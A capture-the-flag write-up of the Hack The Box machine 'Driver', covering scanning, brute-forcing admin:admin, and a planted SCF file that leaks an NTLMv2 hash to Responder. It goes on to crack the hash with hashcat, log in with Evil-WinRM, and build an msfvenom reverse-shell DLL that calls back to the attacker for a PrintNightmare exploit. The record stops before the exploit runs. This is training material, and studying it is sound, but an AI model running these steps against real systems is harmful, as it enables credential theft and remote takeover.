Hello infosec friends! Once again, HTB cheers us up with a simple BOX, in which a pinch of code makes it even more interesting. Let's begin and jump right in!

As always we begin with the nmap scan:

Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-23 12:31 CEST
Nmap scan report for 10.10.11.106
Host is up (0.045s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE      VERSION
80/tcp  open  http         Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open  msrpc        Microsoft Windows RPC
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h14m58s, deviation: 0s, median: 7h14m57s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-10-23T17:47:02
|_  start_date: 2021-10-23T16:55:58

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.59 seconds

As we could expect, being a windows machine (confirmed by the scan) in addition to port 80, we find the standard ports 135 and 445 of the windows native SAMBA protocol that replace the ssh.

As usual, I insert the domain that I will use instead of the IP address of the machine with the HTB standard (therefore driver.htb) in my file /etc/hosts.

It appears that the portal is protected by a domain user. Either way, the SAMBA protocol can give us some interesting information if configured the right way... or wrong! :D

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox/_10.10.11.106 - Driver (win)]
└─$ smbclient -L 10.10.11.106 -N                                                                             130 ⨯
session setup failed: NT_STATUS_ACCESS_DENIED

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox/_10.10.11.106 - Driver (win)]
└─$ rpcclient -U "" -N 10.10.11.106                                                                            1 ⨯
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox/_10.10.11.106 - Driver (win)]
└─$ enum4linux -a 10.10.11.106                                   
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Oct 23 12:40:56 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.11.106
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.11.106    |
 ==================================================== 
[E] Can't find workgroup/domain


 ============================================ 
|    Nbtstat Information for 10.10.11.106    |
 ============================================ 
Looking up status of 10.10.11.106
No reply from 10.10.11.106

 ===================================== 
|    Session Check on 10.10.11.106    |
 ===================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.

It doesn't seem to be our case. However, I have a couple of ideas in mind. First of all, let's try a scan of the UDP ports as well.

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox/_10.10.11.106 - Driver (win)]
└─$ sudo nmap -sU -T4 10.10.11.106                                                                           130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-23 14:02 CEST
Nmap scan report for driver.htb (10.10.11.106)
Host is up (0.065s latency).
All 1000 scanned ports on driver.htb (10.10.11.106) are open|filtered

Nmap done: 1 IP address (1 host up) scanned in 67.06 seconds

Nothing. Ok, I could expand to NON-standard ports, but first let's do a dictionary brute-force on port 80 to identify a misconfigured user.

──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox]
└─$ nmap -p80 --script http-brute 10.10.11.106
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-23 13:57 CEST
Nmap scan report for driver.htb (10.10.11.106)
Host is up (0.55s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-brute: 
|   Accounts: 
|     admin:admin - Valid credentials
|_  Statistics: Performed 45009 guesses in 473 seconds, average tps: 93.2

Nmap done: 1 IP address (1 host up) scanned in 474.96 seconds

I can't believe it, sometimes the simplest and most unlikely solution is just the right one; the user "admin" with password "admin"... not even a novice system administrator.

Perfect, the portal seems to be a sort of site that allows updating the firmware of a printer that shortly after, through the google search, I identify with the model "ricoh" (obviously it would have been enough to look at the name of the image file).

Next step, researching exploits for this type of printer, perhaps targeting the firmware specifically. I report a series of links that have been the subject of my interest in search of ways to circumvent the security of this portal through the features available. In particular, the latest CVE took up most of my time (only on github come out about 12 repositories), but nothing did anything useful.

https://www.cybersecurity-help.cz/vdb/SB2020012421
https://www.cybersecurity-help.cz/exploits/25569/?ref=bulletin
https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/
http://hacking-printers.net/wiki/index.php/Firmware_updates
https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547

So I go back to browsing the portal and after finding the message "Our testing team will review the uploads manually and initiates the testing soon." and crossing this information with a post on the forum where they suggest using the responder, with a little research I find the following link:

Forced Authentication - Red Teaming Experiments
Credential Access, Stealing hashes

Of course, it would seem that just prepare a simple scripting file that can be interpreted by the windows file explorer and as soon as someone tries to read it, the exploit will be activated (certainly a process scheduled on the machine to simulate the work of this hypothetical user). Let's try, activate the responder, deploy the script via the firmware update form and look forward to it.

Here my script file:

[Shell]
Command=2
IconFile=\\10.10.15.131\tools\nc.ico
[Taskbar]
Command=ToggleDesktop

So, the Windows explorer will try to connect to my smb fake share, and the responder will capture the request.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.106 - Driver (win)/attack/scf]
└─$ sudo responder -I tun0 -A                                                                                255 ⨯
[sudo] password for in7rud3r: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.0.6.0

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [ON]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.15.131]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-CRIKFDX5I7V]
    Responder Domain Name      [2PCL.LOCAL]
    Responder DCE-RPC Port     [48461]
[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
[Analyze mode: ICMP] You can ICMP Redirect on this network.
[Analyze mode: ICMP] This workstation (10.10.15.131) is not on the same subnet than the DNS server (192.168.1.1).
[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.

[+] Listening for events...                                                                                        

[SMB] NTLMv2-SSP Client   : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:825df131f89f33d0:6550C5727CC79D2AAC8D328EFBA71802:0101000000000000008C256ACFD1D701550304CE44D473CD00000000020008003200500043004C0001001E00570049004E002D004300520049004B00460044005800350049003700560004003400570049004E002D004300520049004B0046004400580035004900370056002E003200500043004C002E004C004F00430041004C00030014003200500043004C002E004C004F00430041004C00050014003200500043004C002E004C004F00430041004C0007000800008C256ACFD1D70106000400020000000800300030000000000000000000000000200000941168E0803BC47AF2807A23166642F2DA31875A35905CA3C9718A637ABA1F350A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310035002E00310033003100000000000000000000000000                                                                          
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[+] Exiting...

Cool, it looks like such a "tony" fell into the trap and tried to access my shares. But let's try to explain how the responder works.

The victim's PC (in a standard scenario) will try to access a share which, however, does not know the IP address (usually a PC on the network identified by a host name rather than an IP address). It will then ask the DNS server for the resolution of the server (1), but the latter will not be able to resolve it (2), the victim's PC will then begin to broadcast a message to all the available machines on the network, looking for the right server. (3). In this case, my address is already wired, so this step will probably be skipped and will start broadcasting directly. Our machine, with the responder listening, will capture the message and reply confirming its identity (4). At this point the sharing request will be made (5) which will immediately reply requesting the hasing of the password for identification (6). The victim, unaware, will respond by passing his hashing, believing he is logging into a real share (7). Unfortunately this will be captured and an error message will be returned to the caller (8).

Ok, given this explanation, hopefully, exhaustive, let's proceed to attempt a brute-force on the hash via dictionary to try to decode the password using hashcat.

The relative hash-mode for the hash returned by the shared request is 5600.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.106 - Driver (win)/attack/scf]
└─$ hashcat -m5600 /usr/share/responder/logs/SMB-NTLMv2-SSP-10.10.11.106.txt /usr/share/wordlists/rockyou.txt --force 
hashcat (v6.1.1) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 2.0 pocl 1.8  Linux, None+Asserts, RELOC, LLVM 9.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-7300HQ CPU @ 2.50GHz, 4355/4419 MB (2048 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 14 digests; 13 unique digests, 13 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 64 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

TONY::DRIVER:4e7a57926b3bf5af:b535670cc26961fb79c26cb9406d96f8:0101000000000000008c256acfd1d7018efcaafd62f587b900000000020008003200500043004c0001001e00570049004e002d004300520049004b00460044005800350049003700560004003400570049004e002d004300520049004b0046004400580035004900370056002e003200500043004c002e004c004f00430041004c00030014003200500043004c002e004c004f00430041004c00050014003200500043004c002e004c004f00430041004c0007000800008c256acfd1d70106000400020000000800300030000000000000000000000000200000941168e0803bc47af2807a23166642f2da31875a35905ca3c9718a637aba1f350a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310035002e00310033003100000000000000000000000000:liltony
[...]
TONY::DRIVER:4aee2d2ad7ddfe1b:35cc3d2a2b4e9c1bae45399d84dda75b:0101000000000000008c256acfd1d701bddd21684fd5d9a900000000020008003200500043004c0001001e00570049004e002d004300520049004b00460044005800350049003700560004003400570049004e002d004300520049004b0046004400580035004900370056002e003200500043004c002e004c004f00430041004c00030014003200500043004c002e004c004f00430041004c00050014003200500043004c002e004c004f00430041004c0007000800008c256acfd1d70106000400020000000800300030000000000000000000000000200000941168e0803bc47af2807a23166642f2da31875a35905ca3c9718a637aba1f350a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310035002e00310033003100000000000000000000000000:liltony
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: /usr/share/responder/logs/SMB-NTLMv2-SSP-10.10.11.106.txt
Time.Started.....: Thu Nov  4 23:03:18 2021, (1 sec)
Time.Estimated...: Thu Nov  4 23:03:19 2021, (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   626.6 kH/s (2.44ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 13/13 (100.00%) Digests, 13/13 (100.00%) Salts
Progress.........: 425984/186477005 (0.23%)
Rejected.........: 0/425984 (0.00%)
Restore.Point....: 30720/14344385 (0.21%)
Restore.Sub.#1...: Salt:12 Amplifier:0-1 Iteration:0-1
Candidates.#1....: !!!!!! -> eatme1

Started: Thu Nov  4 23:02:01 2021
Stopped: Thu Nov  4 23:03:21 2021

Great, the passwor seems to be "liltony". Well try again on the SAMBA protocol of the windows machine.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.106 - Driver (win)/attack/scf]
└─$ smbclient -L 10.10.11.106 -U DRIVER\\tony                                                                130 ⨯
Enter DRIVER\tony's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.106 - Driver (win)/attack/scf]
└─$ smbclient \\\\10.10.11.106\\C$ -U DRIVER\\tony
Enter DRIVER\tony's password: 
tree connect failed: NT_STATUS_ACCESS_DENIED

We don't seem to be very lucky today.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.106 - Driver (win)/attack/scf]
└─$ rpcclient -U "DRIVER\\tony" 10.10.11.106                                                                 130 ⨯
Enter DRIVER\tony's password: 
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[DefaultAccount] rid:[0x1f7]
user:[Guest] rid:[0x1f5]
user:[NewUser] rid:[0x3ed]
user:[Skriep] rid:[0x3ec]
user:[tony] rid:[0x3eb]

It will be better to use the official tool to access the remote machine: evil-WinRM, which, as I imagined, never disappoints us.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.106 - Driver (win)/attack/scf]
└─$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.11.106 -u DRIVER\\tony -p 'liltony' -s '/ps1_scripts/' -e '/exe_files/'

[sudo] password for in7rud3r: 

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\tony\Documents> dir
*Evil-WinRM* PS C:\Users\tony\Documents> cd ..
*Evil-WinRM* PS C:\Users\tony> cd desktop
*Evil-WinRM* PS C:\Users\tony\desktop> dir


    Directory: C:\Users\tony\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        11/4/2021   5:10 PM             34 user.txt


*Evil-WinRM* PS C:\Users\tony\desktop> type user.txt
0******************************a

And with the access to the system also comes the first flag. Okay, towards privilege escalation now. I provide an interesting link, in which some of the steps that are normally performed for this activity are reported.

Guida alla Privilege Escalation nei sistemi Windows : Hacktips - Guide di Sicurezza Informatica e Hacking Etico
Hacktips - Guide di Sicurezza Informatica e Hacking Etico

Ops, really sorry for you, but very glad for me when I found some links in italian! ;P

Perfect, let's identify the services that are running on this system first of all (schtasks /query /fo LIST /v > lst.txt) and, since the information will be a lot, better create a file and download the output to our machine generated. To do this, evil-WinRM provides a couple of interesting file transfert features built right into the shell.

*Evil-WinRM* PS C:\Users\tony\Documents> download lst.txt /data/lst.txt

Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command                                                                                     

Info: Downloading C:\Users\tony\Documents\lst.txt to /data/lst.txt

                                                             
Info: Download successful!

I remind you that I launched the evil-WinRM via docker container, so the paths to use do not coincide with the local ones of the machine, but with those mapped in the docker start command. Let's take a look at the file anyway.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.106 - Driver (win)/attack/upl]
└─$ more /home/foo/data/lst.txt 
��
Folder: \
HostName:                             DRIVER
TaskName:                             \OneDrive Standalone Update Task-S-1-5-21-3114857038-1253923253-2196841645-10
03
Next Run Time:                        11/6/2021 2:02:58 PM
Status:                               Ready
[...]
HostName:                             DRIVER
TaskName:                             \VerifyFirmware
Next Run Time:                        N/A
Status:                               Running
Logon Mode:                           Interactive only
Last Run Time:                        11/6/2021 7:27:33 AM
Last Result:                          267009
Author:                               DRIVER\Administrator
Task To Run:                          C:\Users\tony\appdata\local\job\job.bat 
Start In:                             N/A
Comment:                              N/A
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          tony
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A

Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft
INFO: There are no scheduled tasks presently available at your access level.
[...]

There is really a lot of information in this report, after having spent a lot of time trying to understand what could be useful for me I find a possible batch file that is worth analyzing those that seem useful to me for educational purposes).

*Evil-WinRM* PS C:\Users\tony\Documents> type C:\Users\tony\appdata\local\job\job.bat
@echo off

:LOOP

%SystemRoot%\explorer.exe "C:\firmwares"

ping -n 20 127.0.0.1 > nul && powershell -ep bypass c:\users\tony\appdata\local\job\quit.ps1

DEL /q C:\firmwares\*

cls

GOTO :LOOP

:EXIT

It seems to open the "firmwares" folder on the root of drive C via the resource explorer and then start a script (c:\users\tony\appdata\local\job\quit.ps1) via powershell (I don't understand the ping on localhost made before, maybe it's used as a kind of delay). It then deletes all files located in the "firmwares" folder (files uploaded via the portal). Give a look at the powershell script too.

*Evil-WinRM* PS C:\Users\tony\Documents> type c:\users\tony\appdata\local\job\quit.ps1
$folder = [uri]'C:\firmwares'
foreach ($w in (New-Object -ComObject Shell.Application).Windows())
{ if ($w.LocationUrl -ieq $folder.AbsoluteUri)
        {$w.Quit(); break}
}

Yes, it appears to be the activation of our exploit. This explains how it was possible to succeed in the previous intrusion. After a few more attempts via scripts and more, I go back (as also suggested in the forum), to the output of the services. Unfortunately I can't find anything particularly interesting; there are only two tasks running for user "tony" and almost all tasks running with administrator rights are of type "COM handler".

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.106 - Driver (win)/attack/upl]
└─$ iconv -f utf-16 -t utf-8 lst.txt | grep -i "task to run" | grep -v "COM handler"
Task To Run:                          %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe 
Task To Run:                          C:\Users\tony\appdata\local\job\job.bat 
Task To Run:                          %windir%\system32\appidpolicyconverter.exe 
Task To Run:                          %windir%\system32\appidcertstorecheck.exe 
Task To Run:                          %windir%\system32\compattelrunner.exe 
Task To Run:                          %windir%\system32\compattelrunner.exe 
Task To Run:                          %windir%\system32\compattelrunner.exe 
Task To Run:                          %windir%\system32\compattelrunner.exe -maintenance
Task To Run:                          %windir%\system32\rundll32.exe Startupscan.dll,SusRunTask
Task To Run:                          %windir%\system32\rundll32.exe Windows.Storage.ApplicationData.dll,CleanupTemporaryState
Task To Run:                          %windir%\system32\dstokenclean.exe 
Task To Run:                          %windir%\system32\rundll32.exe %windir%\system32\AppxDeploymentClient.dll,AppxPreStageCleanupRunTask
Task To Run:                          %windir%\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations
Task To Run:                          BthUdTask.exe $(Arg0)
Task To Run:                          %ProgramFiles%\CUAssistant\culauncher.exe 
Task To Run:                          %ProgramFiles%\CUAssistant\culauncher.exe 
Task To Run:                          %SystemRoot%\System32\wsqmcons.exe 
Task To Run:                          %windir%\system32\WSqmCons.exe -u
Task To Run:                          %windir%\system32\defrag.exe -c -h -o -$
Task To Run:                          %windir%\system32\cleanmgr.exe /autoclean /d %systemdrive%
Task To Run:                          %windir%\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART
Task To Run:                          %windir%\system32\DFDWiz.exe 
Task To Run:                          %windir%\system32\disksnapshot.exe 
Task To Run:                          %windir%\system32\dmclient.exe 
Task To Run:                          %windir%\System32\LocationNotificationWindows.exe 
Task To Run:                          %windir%\System32\WindowsActionDialog.exe 
Task To Run:                          %SystemRoot%\System32\MbaeParserTask.exe 
Task To Run:                          %windir%\system32\lpremove.exe 
Task To Run:                          %windir%\system32\gatherNetworkInfo.vbs 
Task To Run:                          %SystemRoot%\System32\drvinst.exe 6
Task To Run:                          %ProgramFiles%\rempl\sedlauncher.exe 
Task To Run:                          %windir%\System32\wpcmon.exe 
Task To Run:                          %windir%\system32\SpaceAgent.exe 
Task To Run:                          %windir%\system32\SpaceAgent.exe 
Task To Run:                          %windir%\system32\rundll32.exe sysmain.dll,PfSvWsSwapAssessmentTask
Task To Run:                          %windir%\system32\srtasks.exe ExecuteScheduledSPPCreation
Task To Run:                          %windir%\system32\sc.exe start w32time task_started
Task To Run:                          %windir%\system32\tzsync.exe 
Task To Run:                          %systemroot%\system32\usoclient.exe StartInstall
Task To Run:                          %systemroot%\system32\MusNotification.exe Display
Task To Run:                          %systemroot%\system32\usoclient.exe StartInstall
Task To Run:                          C:\Windows\system32\MusNotification.exe Reboot
Task To Run:                          %systemroot%\system32\usoclient.exe ResumeUpdate
Task To Run:                          %systemroot%\system32\usoclient.exe StartScan
Task To Run:                          %systemroot%\system32\usoclient.exe StartScan
Task To Run:                          %systemroot%\system32\usoclient.exe StartScan
Task To Run:                          C:\windows\system32\MusNotification.exe Display
Task To Run:                          C:\windows\system32\MusNotification.exe ReadyToReboot
Task To Run:                          sc.exe config upnphost start= auto
Task To Run:                          %SystemRoot%\System32\WiFiTask.exe 
Task To Run:                          %windir%\system32\wermgr.exe -upload
Task To Run:                          %windir%\system32\wermgr.exe -upload
Task To Run:                          %windir%\system32\wermgr.exe -upload
Task To Run:                          %windir%\system32\rundll32.exe bfe.dll,BfeOnServiceStartTypeChange
Task To Run:                          "%ProgramFiles%\Windows Media Player\wmpnscfg.exe" 
Task To Run:                          C:\Windows\system32\sc.exe start wuauserv
Task To Run:                          C:\Windows\system32\sc.exe start wuauserv
Task To Run:                          C:\Windows\system32\sc.exe start wuauserv
Task To Run:                          C:\Windows\system32\sc.exe start wuauserv
Task To Run:                          %systemroot%\System32\sihclient.exe 
Task To Run:                          %systemroot%\System32\sihclient.exe /boot
Task To Run:                          %SystemRoot%\System32\dsregcmd.exe 

These are the tasks in execution, I exclude the lines that contain "COM handler" in order to better identify the tasks of other types. The iconv command to convert the file from windows to linux format and avoid display and filter problems.

Task To Run:                          %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe 
Status:                               Running
[...]
Task To Run:                          %windir%\system32\lpremove.exe 
Status:                               Running
[...]
Task To Run:                          %windir%\system32\srtasks.exe ExecuteScheduledSPPCreation
Status:                               Running
[...]
Task To Run:                          %systemroot%\System32\sihclient.exe /boot
Status:                               Running

Other running tasks that have been investigated, but which have led me nowhere. A little demoralized, I decide to switch to another very effective tool for the search for possible vulnerabilities aimed at the elevation of privileges: the winpeas.

[...]
  UDP        127.0.0.1             1900          *:*                            868               svcho
st
  UDP        127.0.0.1             62499         *:*                            868               svcho
st
[...]
T%P%P%P%P%P%P%P%P%P%P%c% Looking AppCmd.exe
Z%  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe
    AppCmd.exe was found in C:\Windows\system32\inetsrv\appcmd.exe
      You must be an administrator to run this check
[...]
T%P%P%P%P%P%P%P%P%P%P%c% Analyzing Windows Files Files (limit 70)
    C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
    C:\Users\All Users\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\wording\Generic Model\index.dat
    C:\Program Files\MySQL\MySQL Server 5.5\my.ini
    C:\Users\Default\NTUSER.DAT
    C:\Users\tony\NTUSER.DAT
    C:\Program Files\iis express\PHP\v7.4\php.ini
    C:\Program Files\iis express\PHP\v7.3\php.ini
    C:\Program Files (x86)\iis express\PHP\v7.3\php.ini
    C:\Program Files\Microsoft\Web Platform Installer\WebPlatformInstaller.exe.config
    C:\Program Files\Microsoft\Web Platform Installer\WebpiCmd.exe.config
    C:\Program Files\Microsoft\Web Platform Installer\WebpiCmd-x64.exe.config
[...]

I have reported, once again, only the sections that were of interest to me for the investigation, but even in this case, they were not the correct way to resolve my objective.

The fog before my eyes cleared as I retraced my steps and rethought the main aspect of the BOX: printing. So I searched for "elevation privileges using windows printer", almost absurdly, but on these occasions the simplest way, even if unlikely, is the right one. Two interesting articles turned out to be about it, which I report below.

Remote print server gives anyone Windows admin privileges on a PC
A researcher has created a remote print server allowing any Windows user with limited privileges to gain complete control over a device simply by installing a print driver.

Universal PrivilegeEscalation and Persistence Printer

Unfortunately neither of them work, but investigating the first article and following the links within it, I find that the PrintNightmare exploit is based on CVE-2021-1675. So I search for it on github and an interestingterepository is shown to me.

GitHub - cube0x0/CVE-2021-1675: C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527
C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527 - GitHub - cube0x0/CVE-2021-1675: C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527

Ok, I download the repository on my machine.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.106 - Driver (win)/attack/evil]
└─$ git clone https://github.com/cube0x0/CVE-2021-1675.git     
Cloning into 'CVE-2021-1675'...
remote: Enumerating objects: 173, done.
remote: Counting objects: 100% (173/173), done.
remote: Compressing objects: 100% (105/105), done.
remote: Total 173 (delta 62), reused 133 (delta 36), pack-reused 0
Receiving objects: 100% (173/173), 1.45 MiB | 3.91 MiB/s, done.
Resolving deltas: 100% (62/62), done.

Reading it, it is evident that I have to prepare a payload for a reverse shell (or an attack script anyway). So let's prepare a reverse shell via msfvenom.

msfvenom reverse-shell payload cheatsheet

┌──(in7rud3r㉿Mykali)-[~/…/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.216 LPORT=4444 -f dll > shell-x64.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 8704 bytes

Another thing we read in the repository readme file is that the exploit will use the SAMBA protocol to connect to a share on my local machine and download the reverse-shell. So I have to configure my SAMBA server to accept incoming connections and activate the service (which is definitely off).

To configure the SAMBA protocol, add this line in the /etc/smb.conf file:

[smb]
    comment = Samba
    path = /tmp/
    guest ok = yes
    read only = no
    browsable = yes
    force user = smbuser

The provide to activate the service:

┌──(in7rud3r㉿Mykali)-[~/…/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675]
└─$ sudo service smbd status  
[sudo] password for in7rud3r: 
○ smbd.service - Samba SMB Daemon
     Loaded: loaded (/lib/systemd/system/smbd.service; disabled; vendor preset: disabled)
     Active: inactive (dead)
       Docs: man:smbd(8)
             man:samba(7)
             man:smb.conf(5)
                                                                                                                   
┌──(in7rud3r㉿Mykali)-[~/…/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675]
└─$ sudo service smbd start                                                                                    3 ⨯
                                                                                                                   
┌──(in7rud3r㉿Mykali)-[~/…/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675]
└─$ sudo service smbd status
● smbd.service - Samba SMB Daemon
     Loaded: loaded (/lib/systemd/system/smbd.service; disabled; vendor preset: disabled)
     Active: active (running) since Sun 2021-12-05 12:16:55 CET; 2s ago
       Docs: man:smbd(8)
             man:samba(7)
             man:smb.conf(5)
    Process: 1891 ExecStartPre=/usr/share/samba/update-apparmor-samba-profile (code=exited, status=0/SUCCESS)
   Main PID: 1895 (smbd)
     Status: "smbd: ready to serve connections..."
      Tasks: 4 (limit: 6971)
     Memory: 24.3M
        CPU: 107ms
     CGroup: /system.slice/smbd.service
             ├─1895 /usr/sbin/smbd --foreground --no-process-group
             ├─1897 /usr/sbin/smbd --foreground --no-process-group
             ├─1898 /usr/sbin/smbd --foreground --no-process-group
             └─1900 /usr/sbin/smbd --foreground --no-process-group

Dec 05 12:16:53 Mykali systemd[1]: Starting Samba SMB Daemon...
Dec 05 12:16:55 Mykali systemd[1]: Started Samba SMB Daemon.

Ok, copy the file to the shared folder via smb protocol, start the exploit and once again, cross your fingers.

┌──(in7rud3r㉿Mykali)-[~/…/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675]
└─$ cp shell-x64.dll /tmp/                                                                                   130 ⨯
